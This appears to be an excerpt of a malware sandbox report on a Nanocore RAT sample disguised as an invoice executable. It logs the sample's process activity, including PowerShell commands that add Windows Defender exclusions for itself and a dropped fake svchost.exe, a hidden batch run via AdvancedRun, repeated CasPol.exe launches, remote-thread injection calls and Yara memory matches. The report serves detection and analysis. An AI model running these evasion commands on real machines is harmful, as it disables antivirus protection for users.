      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\RiXHGNhjF\svchost.exe' -Force
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /SpecialRun 4101d8 4716
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3236 -ip 3236
      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 2232
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeProcess created: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
      Source: explorer.exe, 0000000C.00000002.1619604392.0000000001A60000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1619077108.0000000001B90000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1638733727.000000000320F000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: explorer.exe, 0000000C.00000002.1619604392.0000000001A60000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1619077108.0000000001B90000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1616850341.0000000001470000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: explorer.exe, 0000000C.00000002.1619604392.0000000001A60000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1619077108.0000000001B90000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1616850341.0000000001470000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: explorer.exe, 0000000C.00000002.1619604392.0000000001A60000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.1619077108.0000000001B90000.00000002.00000001.sdmp, CasPol.exe, 00000012.00000002.1616850341.0000000001470000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe VolumeInformation
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Users\Public\Documents\RiXHGNhjF\svchost.exe VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\Public\Documents\RiXHGNhjF\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\e21aab79-1085-45fe-9dce-17546e696f1c\AdvancedRun.exeCode function: 4_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
      Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000012.00000002.1639236864.0000000003DF9000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1643028705.0000000005540000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000002.1611766300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.1636915110.000000000448E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 3236, type: MEMORY
      Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.5544629.8.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3dfff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 18.2.CasPol.exe.3e045a5.4.raw.unpack, type: UNPACKEDPE
